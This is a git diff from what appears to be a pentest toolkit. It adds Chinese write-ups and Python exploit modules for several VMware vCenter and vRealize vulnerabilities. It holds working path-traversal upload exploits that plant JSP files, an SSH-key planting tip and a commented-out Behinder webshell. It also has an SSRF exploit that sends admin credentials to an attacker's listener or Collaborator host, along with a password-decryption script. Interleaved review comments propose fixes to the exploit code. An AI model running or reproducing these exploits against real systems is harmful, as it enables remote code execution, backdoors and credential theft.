TarArchiveInputStream in = new TarArchiveInputStream(inputStream); + TarArchiveEntry entry = in.getNextTarEntry(); + ArrayList result = new ArrayList(); +``` + +代码逻辑是将 TAR 文件解压后上传到`/tmp/unicorn_ova_dir` 目录。注意到如下代码: + +```java +while(entry != null) { + if (entry.isDirectory()) { + entry = in.getNextTarEntry(); + } else { + File curfile = new File("/tmp/unicorn_ova_dir", entry.getName()); + File parent = curfile.getParentFile(); + if (!parent.exists()) 
{ + parent.mkdirs(); +``` + +直接将 TAR 的文件名与`/tmp/unicorn_ova_dir`拼接并写入文件。如果文件名内存在 ../ 即可实现目录遍历 + +**tips:** + +如果是Linux系统,并且开放了ssh端口,可上传Linux的ssh 私钥,直接免密登录系统,创建一个包含`../../home/vsphere-ui/.ssh/authorized_keys`的 TAR 文件并上传后利用 SSH 登陆。 + +# 4、漏洞复现 + +手工复现的时候遇到一个坑,看着POST包都没问题,但是上传总是返回FAILED,最后发现是上传的tar包没对应好操作系统,这里应该是解压的时候,不存在的目录也不会自动创建,导致返回FAILED,所以手工复现的时候要注意。 + +下边POST包中,【上传的TAR包内容】部分内容,不能直接复制,不能更改,要借用本地的文件上传环境抓包,修改URI和HOST。 + +POST包: + +```java +POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Content-Type: multipart/form-data; boundary=---------------------------211802199140467231863335463058 +Content-Length: 2796 +Connection: close + +-----------------------------211802199140467231863335463058 +Content-Disposition: form-data; name="uploadFile"; filename="Linux_t.tar" +Content-Type: application/x-tar + +【上传的TAR包内容】 +-----------------------------211802199140467231863335463058-- +``` + +TAR包中的目录格式,Windows系统的为`../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/test.jsp`,Linux系统的为`../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/test.jsp`,至于是poc还是exp更改test.jsp文件内容即可。 + +上传之后poc/exp的位置,Windows系统的为`https://ip:port/statsreport/test.jsp`,Linux系统的为`https://ip:port/ui/resources/test.jsp`。若更改了tar包中的poc/exp的文件名,这里的文件名也相应的改变。 + +# 5、poc + +这里也遇到了两个坑,一是上传的时候不落地文件,想着在内存中生成tar文件,其中用到了tarfile.open,关键是其中的fileobj参数,以及TarInfo和addfile,也是在本地的文件上传环境中不断尝试才成功。二是内存中操作数据的时候,一定要在读取数据的时候使用seek移动读取的位置,默认是数据写到哪,就在哪个位置读取,不用seek的话,一般读到的都是空。 + +poc做了操作系统类型判断,只返回有漏洞的URL和poc URL,方便验证,配合框架可批量,更改content的内容,即可为exp。 \ No newline at end of file diff --git a/Moudle/VCenter/CVE_2021_21972.py b/Moudle/VCenter/CVE_2021_21972.py new file mode 100644 index 0000000..484f0a7 --- /dev/null +++ b/Moudle/VCenter/CVE_2021_21972.py 
@@ -0,0 +1,85 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import tarfile +import io +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-21972' +AUTHOR="境心" +REMARK='VCenter6.7及以下版本任意文件上传漏洞' +FOFA_RULE='title="+ ID_VC_Welcome +"' +###################################################### + +# 内存生成poc tar文件 +def content_poc(target): + windows_filename = "../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/test.jsp" + linux_filename = "../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/test.jsp" + content = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%>""" + system_type = ve_system_poc(target) + if system_type is not None: + mem_string = io.BytesIO() + tr_file = tarfile.open(fileobj=mem_string, mode='w') + if system_type == "windows": + info = tarfile.TarInfo(name=windows_filename) + info.size = len(content) + tr_file.addfile(info, io.BytesIO(content.encode('utf-8'))) + tr_file.close() + elif system_type == "linux": + info = tarfile.TarInfo(name=linux_filename) + info.size = len(content) + tr_file.addfile(info, io.BytesIO(content.encode('utf-8'))) + tr_file.close() + return mem_string,system_type + +# 判断系统类型1 +def ve_system(target): + ve_url = target + '/Ui/vropspluginui/rest/services/uploadova' + res1 = requests.get(ve_url, headers=headers, verify=False, timeout=5) + return res1.status_code + +# 判断系统类型2 +def ve_system_poc(target): + vurl = target + '/ui/vropspluginui/rest/services/uploadova' + ve_res = requests.get(vurl, headers=headers, verify=False, timeout=5) + if ve_res.status_code == 405: + if 
ve_system(target) == ve_res.status_code: + return "windows" + else: + return "linux" + else: + return None + +def poc(target): + result = {} + vurl = target + '/ui/vropspluginui/rest/services/uploadova' + mem_string,system_type = content_poc(target) + # 移动读写位置到最开始 + mem_string.seek(0) + file = [('uploadFile', ('test.tar', mem_string.read(), 'application/x-tar'))] + res = requests.post(vurl, files=file, headers=headers, verify=False, timeout=5) + if "SUCCESS" in res.text: + if system_type == "windows": + poc_url = target + "/statsreport/test.jsp" + elif system_type == "linux": + poc_url = target + "/ui/resources/test.jsp" + res_1 = requests.get(poc_url, headers=headers, verify=False, timeout=5) + if res_1.status_code == 200 and "this is a friendly test" in res_1.text: + result['poc'] = NAME + result['vurl'] = vurl + result['pocurl'] = poc_url + return result + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/VCenter/CVE_2021_22005.md b/Moudle/VCenter/CVE_2021_22005.md new file mode 100644 index 0000000..b7420bc --- /dev/null +++ b/Moudle/VCenter/CVE_2021_22005.md 
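Review bot: `content_poc` returns `mem_string, system_type` after the `if system_type is not None:` block, so when `ve_system_poc` returns `None` (endpoint absent, or a non-405 status) `mem_string` is unbound and `poc` dies with `UnboundLocalError` at `mem_string.seek(0)` instead of reporting "not vulnerable". `info.size = len(content)` also counts characters rather than encoded bytes; it matches today only because the payload is ASCII, and a non-ASCII message would produce a corrupt tar. Both fixes fit in a rewritten `content_poc` plus a two-line guard in `poc`; the OS detection (case-insensitive `/Ui/` vs `/ui/` path → Windows) is a heuristic and deserves a comment saying so. Note too that a successful run leaves `test.jsp` in the target's webapp directory with no cleanup — the module docstring should say that.
```python
def content_poc(target):
    """Build the traversal tar in memory; returns (BytesIO, os_type) or (None, None)."""
    # … unchanged: windows_filename / linux_filename / content …
    system_type = ve_system_poc(target)
    if system_type is None:
        return None, None
    entry_name = windows_filename if system_type == "windows" else linux_filename
    payload = content.encode('utf-8')
    mem_string = io.BytesIO()
    with tarfile.open(fileobj=mem_string, mode='w') as tr_file:
        info = tarfile.TarInfo(name=entry_name)
        info.size = len(payload)  # byte length, not character count
        tr_file.addfile(info, io.BytesIO(payload))
    return mem_string, system_type


def poc(target):
    result = {}
    vurl = target + '/ui/vropspluginui/rest/services/uploadova'
    mem_string, system_type = content_poc(target)
    if mem_string is None:
        return result  # endpoint absent or OS undetermined: nothing to upload
    # … unchanged: seek(0), upload, verification GET …
```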
@@ -0,0 +1,114 @@ +# 漏洞简述 + +能够网络访问vCenter Server 上的 443 端口的攻击者可以通过构造上传请求,上传恶意文件,获取服务器权限,在 vCenter Server 上远程执行代码。该漏洞无需经过身份验证即可远程利用,攻击复杂度低,且无需用户交互。 + +# 影响范围 + +VMware vCenter Server 7.0 + +VMware vCenter Server 6.7 + +# 漏洞复现 + +漏洞检测POST包: + +```java +POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=1231231&_i=456456 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +X-Deployment-Secret: test +Content-Type: application/json +Content-Length: 252 + +{ "manifestSpec":{},"objectType": "a2","collectionTriggerDataNeeded": "True","deploymentDataNeeded":"True","resultNeeded": "True","signalCollectionCompleted":"True","localManifestPath": "a7", +"localPayloadPath": "a8","localObfuscationMapPath": "a9" } +``` + +返回包状态码为201,证明存在漏洞; + +```java +HTTP/1.1 201 +Content-Length: 0 +Date: Thu, 21 Oct 2021 06:30:07 GMT +Server: Apache +``` + +注: + +- URL中的_c和_i,最好是随机生成,因若多次请求同一个站,这两个参数内容若与之前一样,无论网站是否存在漏洞,返回包状态码均固定为409; +- header头中的X-Deployment-Secret必须要有,Content-Type可以没有,但最好带着; + +- data数据中的True,手工测试的时候,要用双引号引起来在;从脚本到手工复现,这个地方被坑了一会 + + + +漏洞poc/exp的POST包: + +```java +POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=1231231&_i=456456 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Content-Type: application/json +X-Deployment-Secret: test +Content-Length: 3590 + + + +{"contextData": "a3", "manifestContent": "\r\n \r\n \r\n \r\n ServiceInstance\r\n \r\n \r\n content.about.instanceUuid\r\n content.about.osType\r\n content.about.build\r\n content.about.version\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n vir:VCenter\r\n \r\n \r\n \r\n ServiceInstance\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n vir:VCenter\r\n \r\n \r\n \r\n ", "objectId": "a2"} +``` + +返回包状态码为200,并且返回如下内容证明上传成功; + +```java +HTTP/1.1 200 +Content-Type: application/json;charset=ISO-8859-1 +Content-Length: 120 +Date: 
Thu, 21 Oct 2021 06:56:40 GMT +Server: Apache + +{"@type":"collection_completed","collection_completed_timestamp":1634799400166,"@id":"2555d5f7f87941498c4b482b9e3e40a4"} +``` + +要访问的上传文件地址为:(ip、端口、文件名自行替换) + +```java +https://ip:port/idm/..;/test.jsp +``` + +注: + +- 此POST包要在上一步的检测POST包之后使用,并且URL中的_c和_i值,至少要是历史中的上一步请求过的(个人理解这两个参数是一个简单的验证),所以这里最好是随机生成,并且分别赋值给这两步中的两个参数,保证每次都是随机不重复,并且还是一样的; +- X-Deployment-Secret与Content-Type与上一步中一样; + +- 作为文件上传,data数据中大部分内容不用变,只变动$appender.setFile和$logger.warn的内容,前者是更改路径的文件名,(上传后要访问的文件),后者是具体的poc/exp内容; +- 仔细看应该也能看出来,这部分最长的一段json的值,在"前边加了\,因为"冲突了。其中的poc/exp部分做了Unicode编码,并且<、>、"是做了两次Unicode编码的(或者不嫌传输内容过长的话,直接把全部的poc/exp的内容两次Unicode编码也可)。不做两次Unicode编码的话,上传上去的<、>、"会被实体化,导致无法解析; + +- 亲测站长上的Unicode编码不好使,即使两次编码,传上去的文件依然无法解析。 + +附字符串转Unicode编码的脚本(二次及以上编码的话,编码后的内容再次当作字符串编码时,每个\要替换为\\): + +```java +string = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities.");%>""" + +string_unicode = "" +for i in string: + asc_chr = ord(i) + print(i) + aa = "\\u{:04x}".format(asc_chr) + string_unicode = string_unicode + aa + +print(string_unicode) +``` + +顺手记录一下上传后情景: + +![](1.png) + + + +# poc/exp: + +根据需求,自行注释切换poc还是exp,不过在输出上更严的做了poc的判断,没做exp是否成功的判断,建议先使用poc验证,再尝试exp,完事手工验证一下是否被拦截。 + +与手工验证利用不一样的地方,poc、exp部分的内容,只需要做一次Unicode编码即可。 \ No newline at end of file diff --git a/Moudle/VCenter/CVE_2021_22005.py b/Moudle/VCenter/CVE_2021_22005.py new file mode 100644 index 0000000..d864f94 --- /dev/null +++ b/Moudle/VCenter/CVE_2021_22005.py 
@@ -0,0 +1,136 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import random +import string +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-22005' +AUTHOR="境心" +REMARK='VMware vCenter Analytics 任意文件上传漏洞' +FOFA_RULE='title="+ ID_VC_Welcome +"' +###################################################### + + +def id_generate(size=6, chars=string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +def poc_content(filename): + file_path = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % (filename) + poc_content_part = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%>""" + # 冰蝎原始 + # poc_content_part = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>""" + poc_content_part_unicode = "" + for i in poc_content_part: + asc_chr = ord(i) + aa = "\\u{:04x}".format(asc_chr) + poc_content_part_unicode = poc_content_part_unicode + aa + + content = """ + + + + ServiceInstance + + + content.about.instanceUuid + content.about.osType + content.about.build + content.about.version + + + + + + + + vir:VCenter + + + + ServiceInstance + + + + + + + 
+ + + + + + vir:VCenter + + + + """ %(file_path, poc_content_part_unicode) + return content + +def Agent(ver_url): + headers = {"User-Agent": ua, + "X-Deployment-Secret": "test" +} + + json_data = { "manifestSpec":{}, + "objectType": "a2", + "collectionTriggerDataNeeded": True, + "deploymentDataNeeded":True, + "resultNeeded": True, + "signalCollectionCompleted":True, + "localManifestPath": "a7", + "localPayloadPath": "a8", + "localObfuscationMapPath": "a9" } + requests.post(ver_url, headers=headers, json=json_data, verify=False) + + +def poc(target): + result = {} + filename = "test5.jsp" + first_id = id_generate() + seconde_id = id_generate() + end_chr = target[-1] + if end_chr == "/": + url = target + "analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (first_id,seconde_id) + poc_url = target + "idm/..;/%s" % (filename) + ver_url = target + "analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (first_id,seconde_id) + else: + url = target + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (first_id,seconde_id) + poc_url = target + "/idm/..;/%s" % (filename) + ver_url = target + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (first_id,seconde_id) + Agent(ver_url) + content = poc_content(filename) + headers = {"User-Agent": ua, + "X-Deployment-Secret": "test" + } + json_data = {"contextData": "a3", "manifestContent": content, "objectId": "a2"} + requests.post(url, headers=headers, json=json_data, verify=False, timeout=5) + poc_res = requests.get(url=poc_url, headers=headers, verify=False) + if "this is a friendly test, Please check and repair upload vulnerabilities." in poc_res.text: + result['poc'] = NAME + result['poc_url'] = poc_url + result['message'] = "存在VMware vCenter Analytics 任意文件上传漏洞" + return result + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1") \ No newline at end of file 
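Review bot: The `requests.post` in `Agent()` and the verification `requests.get(url=poc_url, ...)` in `poc` carry no `timeout`, so a single unresponsive vCenter stalls a batch run indefinitely while the middle POST is bounded at 5 s; add `timeout=5` to both calls. The commented-out Behinder (冰蝎) webshell template in `poc_content` is dead code that ships a ready-made backdoor in a verification module — delete it rather than leave it one uncomment away. As rendered here the `content` template shows no `%s` placeholders yet is `%`-formatted with `(file_path, poc_content_part_unicode)`; if that is the real file content rather than tag stripping in this view, the call raises `TypeError`, so please confirm the placeholders survive. A hit also leaves `test5.jsp` under `webapps/ROOT` with no cleanup, which the module docstring should state.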
diff --git a/Moudle/VRealize/CVE_2021_21975.md b/Moudle/VRealize/CVE_2021_21975.md
new file mode 100644
index 0000000..2d8033c
--- /dev/null
+++ b/Moudle/VRealize/CVE_2021_21975.md
@@ -0,0 +1,211 @@ +# 漏洞简述 + +vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API(路由)的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),并且通过服务器端向监听服务器发送的的request header头,可能会获取认证凭证。 + +# 影响范围 + +vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 + +cloud_foundation: 4.x 3.x + +vRealize_suite_lifecycle_manager: 8.x + +其中vRealize_operations_manager的8.3及以后版本虽存在SSRF漏洞,但已不能获取认证凭证。 + +# 漏洞复现 + +漏洞复现过程: + +构造POST请求包,header头必须包含 Content-Type: application/json ,data格式为字典格式的ip:port/web路径,可以填写多个ip,用逗号分开。 + +```java +POST /casa/nodes/thumbprints HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/json +Content-Length: 24 + +[ +"127.0.0.2:6666"] +``` + +监听请求有两种途径,一是通过自己的vps监听,二是利用burpsuit的Collaborator模块监听 + +第一种途径:通过vps + +在vps监听一个ssl加密协议的端口(一定要ssl加密的端口,否则收到的信息会是乱码,下面坑点处有提到) + +```java +#在vps生成加密证书 +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem + +#监听ssl加密端口,这里为6666 +ncat -lvk 6666 --ssl --ssl-cert cert.pem --ssl-key key.pem +``` + +监听端口之后,发送伪造的请求包,即可看到认证凭证,base64解密后为账号密码 + +![](images/1.png) + +第二种途径:通过burpsuit的Collaborator模块(以下用的是burp2.0版本的,1.7版本可能需要单独安装这个模块) + +Collaborator配置,其实日常使用默认配置就可以了,第三个选项是可以用自己的vps + +![](images/2.png) + +打开Collaborator客户端,点击burpsuit左上角的Burp,选择Burp Collaborator client; + +![](images/3.png) + +伪造的请求包发送之后,就可看到认证凭证了,base64解密就是账号和密码了 + +![](images/4.png) + + + +# 复现坑点 + +使用第二种途径burpsuit Collaborator模块复现时倒是没什么问题,但用第一种途径vps监听端口复现时踩了坑。 + +期间看了漏洞代码的分析、也去找了Collaborator模块能获取到认证凭证的原因,是不是有什么特殊的payload,同时还走了大弯路,想着既然是ssrf漏洞,是不是读取了服务器上的配置文件,然后开始在靶机上各种搜索,通过文件夹名及文件内容过滤,找到了认证凭证存放的配置文件,因为不知道密码加密规则,又在网上找加密方式,未果后,最终还是回到靶机找到了相关的私钥及加密的py脚本,最终解密出来了密码。 + +此时回想起来,感觉到确实走了大弯路,想想还是回到一篇相对较全的复现文章,仔细看复现的那张截图,有哪些特殊的地方,发现监听端口时,使用了ssl加密。随后从网上找到生成加密证书的方法,但本地靶场却还是没复现成功,后边想着是不是环境的问题,就找了网上的环境,一个个测试,最终找到一个确实能获取凭证的,测试后确定成功了。分析可能是本地靶机环境的加密证书问题,不过,虽然网上的这个站获取到了凭证,但账号却不能登录,应该是账号做了限制了。。到此,这次的坑就踩完了。囧 + +相关踩坑的截图: + +1.普通的端口监听,收到的都是乱码 + +![](images/5.png) + +2.本地靶机使用加密端口监听,收到请求时还是报错 + +![](images/6.png) + 
+3.有个站点手工获取到凭证了,解密出来还是无法登录。。。囧,这个可能是以后真用到的时候可能会面对的**真坑** + +![](images/7.png) + +4.靶机中找凭证存放配置文件、私钥存放配置文件、加解密文件 + +根据Collaborator已经获取到的信息中的账号,找到了认证存放配置文件,但未能解密成功; + +```java +find / -name *maintenance* +``` + +![](images/8.png) + +通过相关关键词,找加密的私钥,一顿尝试,找到了,然而通过AES解密,并没有解出来; + +```java +find /usr/lib/vmware-vcops/ -name *key* +``` + +![](images/9.png) + +然后就再找加密、解密的脚本,也是一顿搜索,找到了生成私钥的脚本和加解密的脚本; + +```java +grep -n -r cluster_master_key /usr/lib/ +``` + +![](images/10.png) + +也顺手根据加解密文件名,通过内容查找找到了调用加解密脚本的py脚本; + +```java +grep -n -r vcops_crypt /usr/lib/ +``` + +![](images/11.png) + +分析加解密脚本,发现是用的base64解密及AES解密将上面提到的密码的密文解密出来的。单独将解密部分的方法拿出来测试,确实解出来了密码,但这里已经是走偏的越来越远; + +```java +import os +import sys +from base64 import b64encode, b64decode + +try: + from Crypto.Cipher import AES +except ImportError: + print(__name__ + ': Could not import Crypto.Cipher.AES, probably a test environment') + +#解密方法 +def decrypt_impl_v2(keyFilePath,text: str): + parts = text.split(':') + if len(parts) != 3: + print('ERROR: Invalid message format, unable to decrypt.') + return None + + crypt_settings = None + with open(keyFilePath, 'r') as keyFile: + for line in keyFile: + cs = get_crypt_settings(line) + if cs is not None and cs['version'].lower() == parts[0].lower(): + crypt_settings = cs + break + if crypt_settings is None: + # message is encrypted with unknown key + print('ERROR: Message is encrypted with unknown key.') + return None +#具体的解密语句 + iv = b64decode(parts[1]) + dcipher = AES.new(crypt_settings['key'], AES.MODE_CBC, iv) + ct = b64decode(parts[2]) + return str(unpad(dcipher.decrypt(ct)), 'UTF-8') + +#对私钥内容进行分段提取 +def get_crypt_settings(line: str): + line = line.strip() + if not line: + return None + ret = dict() + parts = line.split(' ') + if len(parts) == 1: + # old key format + key = parts[0].strip() + ret['version'] = 'V1' + ret['key'] = bytes(key, 'UTF-8') + else: + ret['version'] = parts[0] + for s in parts[1:]: + kvPair = s.split('=', 1) + kvPair[0] = kvPair[0].lower() + if 
kvPair[0] == 'key': + ret['key'] = b64decode(bytes(kvPair[1], 'UTF-8')) + + return ret + +def unpad(data: bytes): + return data[0:-(data[-1])] + +#单独把私钥文件和密码密文当做参数传进去 +result = decrypt_impl_v2("cluster_master_key.txt","V2:qSLqYStKf1RpftOQ9l4MKA==:m3zt8+IacO2lDN86HrZRdJGTZi07151GmiWDMWOUeHc=") +print(result) +``` + +# 漏洞修复 + +如果无法安装修补程序,或者没有适用于您的 vRealize Operations 版本的修补程序,可以采取以下步骤来解决该问题。应用此权宜措施不会对 vRealize Operations 产生影响。 + +要在 vRealize Operations 中临时解决此问题,请从 casa-security-context.xml + +1. 通过 SSH 或控制台以 root 身份登录主节点,在控制台中按 ALT+F1 进行登录 +2. 打开 /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml + +1. 查找并删除该行: +2. 保存并关闭文件 + +1. 使用以下命令重新启动 CaSA 服务: service vmware-casa restart +2. 在 vRealize Operations 群集中的所有其他节点上重复步骤 1-5 + + + +# poc + +poc里单独做了一个exp部分,单独使用脚本,加第二个参数即可,第二个参数为vps_ip:port格式或者Collaborator中的域名。需要先vps监听好端口或者使用Collaborator。验证需要到相应的地方去查看header头中是否有Authorization字段。不建议批量exp验证,因网站服务端发送的没有网站的信息,多了容易混乱。 + +使用域名相对方便一些 ,不过经过测试,都有坑,若需要测试多个站,两者都不能不中断的不间断测试,个人分析应该是因为上一个站测试时,https连接还未完全关闭,导致下一个站发送请求时出现问题,vps的解决方法是,ctrl+c中断之后,再重新监听端口,Collaborator的解决方法是Copy to clipboard重新获取一个域名,Collaborator还有个坑是,域名太长,可能会有一些站不能发送https请求过来。 + +纯poc部分的检测方法是通过post请求漏洞URL,对比其状态码判断的,对于要获取认证凭证来说,肯定是存在误报的,有的站虽然有SSRF漏洞,但却不一定能获取到认证凭证。 + diff --git a/Moudle/VRealize/CVE_2021_21975.py b/Moudle/VRealize/CVE_2021_21975.py new file mode 100644 index 0000000..cf2508d --- /dev/null +++ b/Moudle/VRealize/CVE_2021_21975.py 
@@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-21975' +AUTHOR="境心" +REMARK='VMware vRealize&Cloud Foundation SSRF漏洞' +FOFA_RULE='app="vmware-vRealize-Operations-Manager"' +###################################################### + +def ret_data(exp=None): + if exp == None: + data = '["127.0.0.1/admin/login.action"]' + timeout = 5 + elif exp != None: + data = '["%s"]' % exp + timeout = 15 + return data,timeout + +def _request(target,exp=None): + url = target + "/casa/nodes/thumbprints" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", + "Content-Type": "application/json;charset=UTF-8" + } + data,timeout = ret_data(exp) + res = requests.post(url, headers=headers, data=data, verify=False, timeout=timeout) + return res,url + +def poc(target,exp=None): + result = {} + res,url = _request(target,exp) + if exp == None: + if res.status_code == 200: + result['poc'] = NAME + result['poc_url'] = url + result['message'] = '可能存在SSRF漏洞,请手工验证' + return result + elif exp != None: + if res.status_code == 200: + print('请到vps查看header中是否存在Authorization字段') + + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1:443/","4sxpi8otjyj4w0shsthm0ibbn2tvhk.burpcollaborator.net") \ No newline at end of file diff --git a/Moudle/VRealize/CVE_2021_21983.md b/Moudle/VRealize/CVE_2021_21983.md new file mode 100644 index 0000000..068be81 --- /dev/null +++ b/Moudle/VRealize/CVE_2021_21983.md 
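Review bot: The `__main__` block at the end of this hunk commits a live, session-specific `*.burpcollaborator.net` callback hostname into the repository; that value belongs to one author's session and should be an obvious placeholder, e.g. `poc("https://127.0.0.1:443/", "<CALLBACK_HOST>")`. The same call passes a target ending in `/` while `_request` builds `target + "/casa/nodes/thumbprints"`, so the request URL carries a double slash — `url = target.rstrip("/") + "/casa/nodes/thumbprints"` avoids it. In `ret_data` and `poc`, `exp == None` / `exp != None` should be `is None` / `is not None`, and the `elif exp != None:` branches are just `else:`. `poc` has no docstring; it should state that a 200 from the endpoint is only a heuristic (its own message says manual verification is required) and that the `exp` path prints to stdout and returns `None` rather than a result dict.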
@@ -0,0 +1,88 @@ +# 漏洞简述 + +vRealize 路由中存在一上传功能,由于未对上传做任何安全过滤,导致可在有认证凭证的情况下,实现任意文件上传,获取服务器控制权限。 + +亲测,上一波漏洞CVE-2021-21975中获取到认证信息,但无法通过web管理端登录的问题,此漏洞可不受其限制,只要认证信息准确,依然能够实现任意文件上传,获取控制权限。 + +# 影响范围 + +vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 + +cloud_foundation: 4.x 3.x + +vRealize_suite_lifecycle_manager: 8.x + +限于环境问题,最高测试到vRealize_operations_manager的8.3.0.17501340版本,都是存在该漏洞的,虽然8.3版本开始,通过SSRF漏洞已不能获取到认证信息,但若在能知晓认证信息的情况下,还是能获取到控制权限的。 + +# 漏洞分析 + +casa/classes/com/vmware/vcops/casa/appconfig/CertificateController.class位置 存在一路由,这里使用POST方法接收了两个参数name和file + +![](images/21.png) + +跟进 CertificateService#handleCertificateFile,这里创建了一个File对象,直接使用transferTo函数上传文件,两个参数都可控,没有任何过滤,就出现了任意文件上传漏洞。 + +![](images/22.png) + + + + + +# 漏洞复现 + +POST包: + +```java +POST /casa/private/config/slice/ha/certificate HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjI6L21UN3dGSFh0VFM3Q2ZDMklQWnc2Mmcv +Te: trailers +Connection: close +Content-Length: 492 + +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="name" + +../../../../../usr/lib/vmware-casa/casa-webapp/webapps/casa/test1.jsp +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="file"; filename="" +Content-Type: image/jpeg + +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%> +------WebKitFormBoundarypyfBh1YB4pV8McGB-- +``` + 
+网上均是文章一大抄,没有看到一篇放POST包的,文章内容截图一模一样。这里根据分析的代码部分,URL为第一张图中的路由,访问该URL,登录抓包,看到其中熟悉的header头,Authorization字段,在CVE-2021-21975中获取的就是这个东东。亲测默认的admin账号也可以实现效果,格式为admin:password的base64加密。 + +POST包为常规的文件上传的Content-Type格式,主要有两个核心上传参数name和file。name的value为文件名,file的value为文件内容。 + +尝试默认上传位置为/storage/vcops/user/conf/ssl/,上传之后无法通过web访问到;就想到在文件名的位置通过../构造切换web可访问的位置。 + +路径切换的时候,文件并不能保存到操作系统根目录下,但可借助切换到根目录时,无缝衔接切换到根目录下的其他文件夹下,就有了上面POST包中的name参数的value。这样文件上传后的URL为:https://ip:port/casa/test1.jsp,自行更改上传的文件名。 + + + +如果上传shell的话,记得也要加上Authorization哈,否则返回401;比如冰蝎: +![](images/23.png) + + + +# poc/exp + +此poc需要传入认证信息,格式为user:password格式的base64编码,详情见CVE-2021-21975漏洞获取的认证信息。 + +更改content中的poc部分为shell,即可实现exp。exp的时候,记得先更改一下脚本中的判断部分,详见脚本中的注释提示。 + diff --git a/Moudle/VRealize/CVE_2021_21983.py b/Moudle/VRealize/CVE_2021_21983.py new file mode 100644 index 0000000..ca434c2 --- 